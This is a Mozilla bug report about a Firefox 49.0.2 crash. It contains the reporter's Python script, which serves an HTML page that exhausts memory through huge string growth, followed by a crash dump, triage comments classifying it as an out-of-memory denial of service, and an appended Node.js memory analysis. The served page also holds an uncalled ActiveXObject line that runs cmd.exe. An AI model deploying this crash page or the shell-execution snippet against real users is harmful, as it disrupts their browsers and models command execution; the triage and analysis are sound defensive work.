Open Bug 1314862 Opened 9 years ago Updated 3 years ago

Mozilla Firefox 49.0.2 - crash-buffer some tools

Categories
(Core :: DOM: Core & HTML, defect, P3)
49 Branch
defect

People
(Reporter: sultanalbalawi00, Unassigned)

Details
(Keywords: crash, csectype-oom, testcase, Whiteboard: [sg:dos])

Attachments
(2 files)
Hello. This is a new security bug in the latest version.

#!/usr/bin/env python3
# Exploit Title: Mozilla Firefox 49.0.2 Crash
# Date: 2-11-2016
# Author: sultan albalawi
# Video: https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater
# It's working with Tor Browser; you can try.
# Tested on: Win7
#
# Writes the test page to disk and serves it over HTTP. The page's script
# builds a ~250 million character string and assigns it to document.title.
from http.server import BaseHTTPRequestHandler, HTTPServer

host = '192.168.88.254'
port = 8080

# Cosmetic banner, decoded from the hex escapes in the original script.
ban = r"""
       \   -  -  - <server>  - \---< - -  - -  -  *
                                                 ***
        |    Doc_Attack                          *****
       |                                       *******
       v        ` `.    ,;'                  ****ApP****
                `.  ,'/ .'                  *************
                 `. X /.'             *     *************
       .-;--''--._` ` (              ***          |
     .'           /    '            *****         | database
     ;Security`  ' 0  0 '         ***NET***       |
    ,       ,    '  |  '          *********       ^
 ,. |       '     `._.'               |-------^---^          /
 :  . `  ;   `  ` --,.._;--->         |       '.'.'________ *
  ' `    ,   )   .'                   ^        |_| Firewall )
     `._ ,  '   /_                    |            ||    ||
        ; ,''-,;' ``-_________________|
         ``-..__``--`       ips       -           ^            /
                                       -        '. _---------*
                                        -_______ |_  IPS     )
                                                     ||     ||

Sultan_Albalawi
https://www.facebook.com/pentest3
"""

print(ban)
print("please wait ....")

# The page served to the browser, decoded from the original's hex escapes.
# ex() is never called, and ActiveXObject does not exist in Firefox, so the
# ShellExecute line has no effect. The crash comes from the bare block after
# it: 50,000 'A's, appended to a copy of itself 5,000 times (250,050,000
# characters in total), then assigned to document.title.
htmlcrach = r'''<html>
<script type="text/javascript">
function ex()
{
var objShell = new ActiveXObject("shell.application");
objShell.ShellExecute("cmd.exe", "cd C: C:\\cd c:\\ext_file main.exe test.txt", "C:\\WINDOWS\\system32", "open", 1);
}
{
var buf = "";
for (var i = 0; i <50000; i++) {
buf += "A";
}
var buff = buf;
for (i = 0; i <5000; i++) {
buff += buf;
}
document.title = buff;
}
</script>
</a></body></html>'''

# (The original also appended the page to `ban` 5,001 times after printing
# the banner; the result was never used, so that loop is omitted here.)


class Req(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(htmlcrach.encode('utf-8'))


class runHTTP(HTTPServer):
    def __init__(self, host, port):
        ipadd = (host, port)
        HTTPServer.__init__(self, ipadd, Req)


def createfile():
    # Also drop the page on disk so it can be opened locally (file:// URL).
    global filecreate
    filecreate = "test.html"
    with open(filecreate, "wb") as f:
        f.write(htmlcrach.encode('utf-8'))
    print('file done: {}'.format(filecreate))


def start():
    ser = runHTTP(host, port)
    print("http://{}:{}/{}".format(host, port, filecreate))
    ser.serve_forever()


createfile()
start()
AdapterDeviceID: 0x0412
AdapterDriverVersion: 10.18.10.3412
AdapterSubsysID: 05a41028
AdapterVendorID: 0x8086
Add-ons: %7B8f8fe09b-0bd3-4470-bc1b-8cad42b8203b%7D:0.17.1-signed,%7BF5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4%7D:1.6.3.1-signed.1-signed,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:49.0.2,heartbleed%40dactyl.googlecode.com:0.1.1.1-signed.1-signed,jid1-eMhaOaq3SPBFDg%40jetpack:0.2.1.1-signed.1-signed,HiddenUIElements%40LukaszPolowczyk:1.0.8,%7B1018e4d6-728f-4b20-ad56-37578a4de76b%7D:5.1.16,asyncrendering%40mozilla.org:2.0,e10srollout%40mozilla.org:1.3,firefox%40getpocket.com:1.0.4,webcompat%40mozilla.org:1.0
AddonsShouldHaveBlockedE10s: 1
AvailablePageFile: 57130303488
AvailablePhysicalMemory: 25107955712
AvailableVirtualMemory: 2163433472
BIOS_Manufacturer: Dell Inc.
BlockedDllList:
BreakpadReserveAddress: 46596096
BreakpadReserveSize: 67108864
BuildID: 20161019084923
CrashTime: 1478144769
E10SCohort: disqualified-test
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1477132917
MozCrashReason: MOZ_CRASH()
Notes: AdapterVendorID: 0x8086, AdapterDeviceID: 0x0412, AdapterSubsysID: 05a41028, AdapterDriverVersion: 10.18.10.3412 FP(D000-L10010-W00000000-T0000) D2D1.1? DWrite? DWrite+ D2D1.1+ D3D11 Layers? D3D11 Layers+
ProductID: {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
ProductName: Firefox
ReleaseChannel: release
SafeMode: 0
SecondsSinceLastCrash: 16
StartupTime: 1478144760
SystemMemoryUsePercentage: 26
TelemetryEnvironment: {"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86","buildId":"20161019084923","version":"49.0.2","vendor":"Mozilla","platformVersion":"49.0.2","xpcomAbi":"x86-msvc","hotfixVersion":"20160826.01"},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":32676,"virtualMaxMB":4096,"cpu":{"count":8,"cores":4,"vendor":"GenuineIntel","family":6,"model":60,"stepping":3,"l2cacheKB":256,"l3cacheKB":8192,"speedMHz":3591,"extensions":["hasMMX","hasSSE","hasSSE2","hasSSE3","hasSSSE3","hasSSE4_1","hasSSE4_2","hasAVX","hasAVX2"]},"os":{"name":"Windows_NT","version":"6.1","locale":"ar-SA","servicePackMajor":1,"servicePackMinor":0,"installYear":2015},"hdd":{"profile":{"model":"ST500DM002-1BD142","revision":"KC48"},"binary":{"model":"ST500DM002-1BD142","revision":"KC48"},"system":{"model":"ST500DM002-1BD142","revision":"KC48"}},"gfx":{"D2DEnabled":true,"DWriteEnabled":true,"adapters":[{"description":"Intel(R) HD Graphics 4600","vendorID":"0x8086","deviceID":"0x0412","subsysID":"05a41028","RAM":null,"driver":"igdumdim64 igd10iumd64 igd10iumd64 igdumdim32 igd10iumd32 
igd10iumd32","driverVersion":"10.18.10.3412","driverDate":"1-29-2014","GPUActive":true}],"monitors":[{"screenWidth":1920,"screenHeight":1080,"refreshRate":60,"pseudoDisplay":false}],"features":{"compositor":"d3d11","d3d11":{"status":"available","version":45056,"warp":false,"textureSharing":true,"blacklisted":false},"d2d":{"status":"available","version":"1.1"}}},"isWow64":true},"settings":{"blocklistEnabled":true,"e10sEnabled":false,"e10sCohort":"disqualified-test","telemetryEnabled":false,"locale":"en-US","update":{"channel":"release","enabled":true,"autoDownload":true},"userPrefs":{"browser.cache.disk.capacity":358400,"browser.newtab.url":"<user-set>","browser.newtabpage.enhanced":true},"addonCompatibilityCheckEnabled":true,"isDefaultBrowser":true},"profile":{"creationDate":17016},"addons":{"activeAddons":{"heartbleed@dactyl.googlecode.com":{"blocklisted":false,"description":"Notify of heartbleed vulnerabilities","name":"Heartbleed Notifier","userDisabled":false,"appDisabled":false,"version":"0.1.1.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17032,"updateDay":17032,"signedState":2,"isSystem":false},"jid1-eMhaOaq3SPBFDg@jetpack":{"blocklisted":false,"description":"A Firefox add-on to notify you when you visit a webpage vulnerable to Heartbleed","name":"Heartbleed Monitor","userDisabled":false,"appDisabled":false,"version":"0.2.1.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17032,"updateDay":17032,"signedState":2,"isSystem":false},"{8f8fe09b-0bd3-4470-bc1b-8cad42b8203b}":{"blocklisted":false,"description":"View HTTP headers of a page and while browsing.","name":"Live HTTP headers(Fixed By 
Danyial.com)","userDisabled":false,"appDisabled":false,"version":"0.17.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17036,"updateDay":17036,"signedState":1,"isSystem":false},"{F5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4}":{"blocklisted":false,"description":"A toolbar that helps you find and test SQL injections","name":"HackBar","userDisabled":false,"appDisabled":false,"version":"1.6.3.1-signed.1-signed","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17077,"updateDay":17077,"signedState":2,"isSystem":false},"HiddenUIElements@LukaszPolowczyk":{"blocklisted":false,"description":"Options removing not removable browser UI elements.","name":"Hidden UI Elements","userDisabled":false,"appDisabled":false,"version":"1.0.8","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17078,"updateDay":17078,"signedState":2,"isSystem":false},"{1018e4d6-728f-4b20-ad56-37578a4de76b}":{"blocklisted":false,"description":"Displays a flag depicting the location of the current server","name":"Flagfox","userDisabled":false,"appDisabled":false,"version":"5.1.16","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17031,"updateDay":17086,"signedState":2,"isSystem":false},"e10srollout@mozilla.org":{"blocklisted":false,"description":"Staged rollout of Firefox multi-process feature.","name":"Multi-process staged rollout","userDisabled":false,"appDisabled":false,"version":"1.3","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"firefox@getpocket.com":{"blocklisted":false,"description":"When you find something you want to view later, put it in 
Pocket.","name":"Pocket","userDisabled":false,"appDisabled":false,"version":"1.0.4","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"webcompat@mozilla.org":{"blocklisted":false,"description":"Urgent post-release fixes for web compatibility.","name":"Web Compat","userDisabled":false,"appDisabled":false,"version":"1.0","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17069,"updateDay":17095,"isSystem":true},"asyncrendering@mozilla.org":{"blocklisted":false,"description":"Enables asynchronous drawing mode for plugins.","name":"Asynchronous Plugin Rendering","userDisabled":false,"appDisabled":false,"version":"2.0","scope":1,"type":"extension","foreignInstall":false,"hasBinaryComponents":false,"installDay":17101,"updateDay":17101,"signedState":3,"isSystem":true}},"theme":{"id":"{972ce4c6-7e08-4474-a285-3208198ce6fd}","blocklisted":false,"description":"The default theme.","name":"Default","userDisabled":false,"appDisabled":false,"version":"49.0.2","scope":4,"foreignInstall":false,"hasBinaryComponents":false,"installDay":16956,"updateDay":17095},"activePlugins":[{"name":"Adobe Acrobat","version":"8.1.0.137","description":"Adobe PDF Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.adobe.x-mars","application/vnd.fdf","application/vnd.adobe.xfdf","application/vnd.adobe.xdp+xml","application/vnd.adobe.xfd+xml"],"updateDay":13643},{"name":"VLC Web Plugin","version":"2.2.4.0","description":"VLC media player Web 
Plugin","blocklisted":false,"disabled":false,"clicktoplay":false,"mimeTypes":["audio/mp1","audio/mp2","audio/mp3","audio/mpeg","audio/mpg","audio/x-mp1","audio/x-mp2","audio/x-mp3","audio/x-mpeg","audio/x-mpg","video/mpeg","video/x-mpeg","video/mp2t","video/mpeg-system","video/x-mpeg-system","video/x-mpeg2","audio/aac","audio/x-aac","audio/mp4","audio/x-m4a","audio/m4a","video/mp4","application/mpeg4-iod","application/mpeg4-muxcodetable","application/x-extension-m4a","application/x-extension-mp4","video/x-m4v","video/mp4v-es","audio/x-pn-windows-acm","video/divx","video/msvideo","video/vnd.divx","video/x-avi","video/x-msvideo","application/ogg","video/ogg","audio/ogg","application/x-ogg","video/x-ogm+ogg","video/x-theora+ogg","video/x-theora","audio/x-vorbis+ogg","audio/x-vorbis","audio/x-speex","audio/ogg;codecs=opus","audio/opus","application/x-vlc-plugin","audio/x-ms-asf","audio/x-ms-asx","audio/x-ms-wax","video/x-ms-asf","video/x-ms-asf-plugin","video/x-ms-asx","video/x-ms-asf-plugin","video/x-ms-asf","application/x-mplayer2","video/x-ms-wm","video/x-ms-wmv","video/x-ms-wmx","video/x-ms-wvx","audio/x-ms-wma","application/x-google-vlc-plugin","audio/wav","audio/x-wav","audio/x-pn-wav","audio/x-pn-au","video/3gp","audio/3gpp","video/3gpp","audio/3gpp2","video/3gpp2","video/fli","video/flv","video/x-flc","video/x-fli","video/x-flv","application/x-matroska","video/x-matroska","audio/x-matroska","application/xspf+xml","audio/mpegurl","audio/x-mpegurl","audio/scpls","audio/x-scpls","text/google-video-pointer","text/x-google-video-pointer","video/vnd.mpegurl","application/vnd.apple.mpegurl","application/vnd.ms-asf","application/vnd.ms-wpl","application/sdp","audio/dv","video/dv","audio/x-aiff","audio/x-pn-aiff","video/x-anim","video/webm","audio/webm","application/ram","application/vnd.rn-realmedia-vbr","application/vnd.rn-realmedia","audio/vnd.rn-realaudio","audio/x-pn-realaudio-plugin","audio/x-pn-realaudio","audio/x-real-audio","audio/x-realaudio","video/vnd.rn-real
video","audio/amr-wb","audio/amr","audio/amr-wb","audio/amr","application/x-flac","audio/x-flac","audio/flac","application/x-flash-video","application/x-shockwave-flash","audio/ac3","audio/eac3","audio/basic","audio/midi","audio/vnd.dts.hd","audio/vnd.dolby.heaac.1","audio/vnd.dolby.heaac.2","audio/vnd.dolby.mlp","audio/vnd.dts","audio/x-ape","audio/x-gsm","audio/x-musepack","audio/x-shorten","audio/x-tta","audio/x-wavpack","audio/x-it","audio/x-mod","audio/x-s3m","audio/x-xm","application/mxf","image/vnd.rn-realpix","misc/ultravox","video/x-nsv"],"updateDay":16953},{"name":"Google Update","version":"1.3.31.5","description":"Google Update","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/x-vnd.google.update3webcontrol.3","application/x-vnd.google.oneclickctrl.9"],"updateDay":17010},{"name":"应用宝一键安装插件","version":"2.0.201.3198","description":"QQPhoneManager Onekey-Install plug-in for Android Phones","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/qqphonemanagerplugin"],"updateDay":16220},{"name":"Java(TM) Platform SE 8 U71","version":"11.71.2.15","description":"Next Generation Java Plug-in 11.71.2 for Mozilla 
browsers","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/x-java-applet","application/x-java-bean","application/x-java-vm","application/x-java-applet;version=1.1.1","application/x-java-bean;version=1.1.1","application/x-java-applet;version=1.1","application/x-java-bean;version=1.1","application/x-java-applet;version=1.2","application/x-java-bean;version=1.2","application/x-java-applet;version=1.1.3","application/x-java-bean;version=1.1.3","application/x-java-applet;version=1.1.2","application/x-java-bean;version=1.1.2","application/x-java-applet;version=1.3","application/x-java-bean;version=1.3","application/x-java-applet;version=1.2.2","application/x-java-bean;version=1.2.2","application/x-java-applet;version=1.2.1","application/x-java-bean;version=1.2.1","application/x-java-applet;version=1.3.1","application/x-java-bean;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-bean;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-bean;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-bean;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-bean;version=1.5","application/x-java-applet;version=1.6","application/x-java-bean;version=1.6","application/x-java-applet;version=1.7","application/x-java-bean;version=1.7","application/x-java-applet;version=1.8","application/x-java-bean;version=1.8","application/x-java-applet;jpi-version=1.8.0_71","application/x-java-bean;jpi-version=1.8.0_71","application/x-java-vm-npruntime","application/x-java-applet;deploy=11.71.2","application/x-java-applet;javafx=8.0.71"],"updateDay":16830},{"name":"Java Deployment Toolkit 8.0.710.15","version":"11.71.2.15","description":"NPRuntime Script Plug-in Library for Java(TM) Deploy","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/java-deployment-toolkit"],"updateDay":16830},{"name":"Foxit PhantomPDF Plugin for 
Mozilla","version":"2.2.5.1228","description":"Foxit PhantomPDF Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.fdf","application/vnd.ppdf"],"updateDay":16798},{"name":"Shockwave Flash","version":"23.0.0.205","description":"Shockwave Flash 23.0 r0","blocklisted":false,"disabled":false,"clicktoplay":false,"mimeTypes":["application/x-shockwave-flash","application/futuresplash"],"updateDay":17101},{"name":"Foxit Reader Plugin for Mozilla","version":"2.2.5.107","description":"Foxit Reader Plug-In For Firefox and Netscape","blocklisted":false,"disabled":false,"clicktoplay":true,"mimeTypes":["application/pdf","application/vnd.fdf","application/vnd.ppdf"],"updateDay":16477}],"activeGMPlugins":{"gmp-gmpopenh264":{"version":"1.6","userDisabled":false,"applyBackgroundUpdates":1},"gmp-eme-adobe":{"version":"17","userDisabled":false,"applyBackgroundUpdates":1},"gmp-widevinecdm":{"version":"1.4.8.903","userDisabled":false,"applyBackgroundUpdates":1}},"activeExperiment":{},"persona":null}}
Theme: classic/1.0
Throttleable: 1
TotalPageFile: 68524994560
TotalPhysicalMemory: 34263449600
TotalVirtualMemory: 4294836224
URL: http://192.168.88.253:8080/test.html
UptimeTS: 31.785503777
User32BeforeBlocklist: 1
Vendor: Mozilla
Version: 49.0.2
Winsock_LSP:
  MSAFD Tcpip [TCP/IP] : 2 : 2 : 1 : 6 : 0x20066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
  MSAFD Tcpip [UDP/IP] : 2 : 2 : 2 : 17 : 0x20609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
  MSAFD Tcpip [RAW/IP] : 2 : 2 : 3 : 0 : 0x20609 : 0xc : %SystemRoot%\system32\mswsock.dll : : e70f1aa0-ab8b-11cf-8ca3-00805f48a192
  MSAFD Tcpip [TCP/IPv6] : 2 : 23 : 1 : 6 : 0x20066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
  MSAFD Tcpip [UDP/IPv6] : 2 : 23 : 2 : 17 : 0x20609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
  MSAFD Tcpip [RAW/IPv6] : 2 : 23 : 3 : 0 : 0x20609 : 0xc : %SystemRoot%\system32\mswsock.dll : : f9eab0c0-26d4-11d0-bbbf-00aa006c34e4
  RSVP TCPv6 Service Provider : 2 : 23 : 1 : 6 : 0x22066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
  RSVP TCP Service Provider : 2 : 2 : 1 : 6 : 0x22066 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
  RSVP UDPv6 Service Provider : 2 : 23 : 2 : 17 : 0x22609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
  RSVP UDP Service Provider : 2 : 2 : 2 : 17 : 0x22609 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 9d60a9e0-337a-11d0-bd88-0000c082e69a
  vSockets DGRAM : 0 : 28 : 2 : 0 : 0x9 : 0x8 : %windir%\system32\vsocklib.dll : : 570adc4b-67b2-42ce-92b2-acd33d88d842
  vSockets STREAM : 0 : 28 : 1 : 0 : 0x26 : 0x8 : %windir%\system32\vsocklib.dll : : 570adc4b-67b2-42ce-92b2-acd33d88d842
useragent_locale: en-US

This report also contains technical information about the state of the application when it crashed.
OS: All → Windows 7
Version: unspecified → 49 Branch
Attached image firefoxbl.png
plugin container for firefox Buffer Overflow
OS: Windows 7 → All
Summary: Mozilla Firefox 49.0.2 - Denial of Service → Mozilla Firefox 49.0.2 - crash-buffer some tools
Did you get a Firefox crash dialog, and did you submit the crash to us? That would have information in a useful form for us. You can find the crash links (if you did so) by opening the page about:crashes
Group: firefox-core-security → core-security
Component: Activity Streams: Application Servers → General
Flags: needinfo?(sultanalbalawi00)
Flags: needinfo?(dveditz)
Product: Firefox → Core
Attached file test_case.html
Added the decoded test case. No luck reproducing this, though.
FYI, unable to reproduce on Mac, latest release 49.0.2 and Nightly 52.
(In reply to Daniel Veditz [:dveditz] from comment #3)
> Did you get a Firefox crash dialog, and did you submit the crash to us? That
> would have information in a useful form for us. You can find the crash links
> (if you did so) by opening the page about:crashes

This is a problem in the program. Why do you not treat this matter in the future and place restrictions on JavaScript code? Thanks.
Component: General → Untriaged
Group: core-security → dom-core-security
I can reproduce in a 32-bit build on Win7: bp-55908f00-fb04-4f13-a8f3-ad5f92161110

It's an intentional out-of-memory crash due to the exponential string growth. It's essentially a dupe of similar PoCs we see, crashing in a slightly different place but for the same reason. It would be friendlier to throw an exception in the script context than to crash everything, though the coming multi-process builds turn this into a less-painful crash for just the abusive tab rather than everything.
Group: dom-core-security
Status: UNCONFIRMED → NEW
Crash Signature: [@ OOM | unknown | NS_ABORT_OOM | nsContentUtils::GetNodeTextContent ]
Component: Untriaged → DOM
Ever confirmed: true
Flags: needinfo?(sultanalbalawi00)
Flags: needinfo?(dveditz)
Whiteboard: [sg:dos]
Priority: -- → P3
Component: DOM → DOM: Core & HTML
Severity: normal → S3
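The arithmetic behind that diagnosis, as an added example in Node.js that is not part of the bug report or of Mozilla's code. It mirrors the two loops of the attached testcase to compute the string it builds (50,000 x (5,000 + 1) = 250,050,000 characters), sizes that against the AvailableVirtualMemory figure from the crash report (2,163,433,472 bytes in a 32-bit process), and shows what "throw an exception in the script context" looks like: V8 checks the result length of String.prototype.repeat against its maximum string length and throws a catchable RangeError before allocating anything. SpiderMonkey enforces a comparable cap on JS strings, and the testcase stays below it, which is why the script itself succeeds; the abort comes from the DOM side, where nsContentUtils::GetNodeTextContent (the crash signature) has to hold the text as UTF-16, roughly 500 MB in one allocation, in a process with about 2 GB of address space left, and an infallible allocation that fails ends in NS_ABORT_OOM. The report's TelemetryEnvironment also shows "e10sEnabled":false (E10SCohort: disqualified-test, AddonsShouldHaveBlockedE10s: 1), so the whole browser went down, which is the single-process case dveditz contrasts with the multi-process builds. The function names and the budget constant are this example's own; buildLikeTestcase takes its sizes as parameters so it can be run at a scale that fits in a normal Node heap.

```javascript
// Added example (not from the bug report or Mozilla's tree): the memory
// arithmetic of the attached testcase, and the script-level failure an
// engine's string-length limit gives instead of an OOM abort.

// Loop bounds from the testcase: buf = 50,000 'A's; buff = buf; then
// buff += buf 5,000 times.
const CHUNK_LEN = 50000;
const REPEATS = 5000;

// AvailableVirtualMemory from the crash report (32-bit Firefox 49.0.2, Win7).
const AVAILABLE_VIRTUAL_BYTES = 2163433472;

// Number of characters the testcase ends up assigning to document.title.
function testcaseLength(chunkLen = CHUNK_LEN, repeats = REPEATS) {
  return chunkLen * (repeats + 1);
}

// Bytes for one flat copy of the string: 1 byte/char while the JS engine can
// keep an all-'A' string as Latin1, 2 bytes/char once the DOM holds it as
// UTF-16.
function bytesNeeded(chars) {
  return { latin1: chars, utf16: chars * 2 };
}

// Fraction of the remaining address space that a single UTF-16 copy takes.
// The copy must also be contiguous, so a 32-bit process can fail well before
// this fraction reaches 1; treat it as a floor, not a ceiling.
function shareOfBudget(chars, budgetBytes = AVAILABLE_VIRTUAL_BYTES) {
  return bytesNeeded(chars).utf16 / budgetBytes;
}

// The testcase's two loops, at a scale chosen by the caller. With the real
// bounds this needs ~250 MB for buff alone; small values reproduce the
// shape of the growth without the memory cost.
function buildLikeTestcase(chunkLen, repeats) {
  let buf = "";
  for (let i = 0; i < chunkLen; i++) buf += "A";
  let buff = buf;
  for (let i = 0; i < repeats; i++) buff += buf;
  return buff;
}

// The friendlier failure mode: V8 compares the requested length with its
// maximum string length and throws RangeError ("Invalid string length")
// without allocating, so the page's script stops and the tab survives.
function tryBuild(chars) {
  try {
    return { ok: true, length: "A".repeat(chars).length };
  } catch (e) {
    return { ok: false, error: e.name, message: e.message };
  }
}

function report() {
  const n = testcaseLength();
  const share = (shareOfBudget(n) * 100).toFixed(1);
  console.log(`testcase string: ${n} chars`);
  console.log(`one UTF-16 copy: ${bytesNeeded(n).utf16} bytes, ${share}% of free virtual memory`);
  console.log(`small-scale build: ${buildLikeTestcase(5, 3).length} chars`);
  console.log("oversized build:", tryBuild(2 ** 31));
}

report();
```

Run it with `node` and the last line shows the RangeError being caught by the page script rather than taking the process down; swap the bounds passed to buildLikeTestcase for the real ones only on a machine where a few hundred megabytes of heap is acceptable.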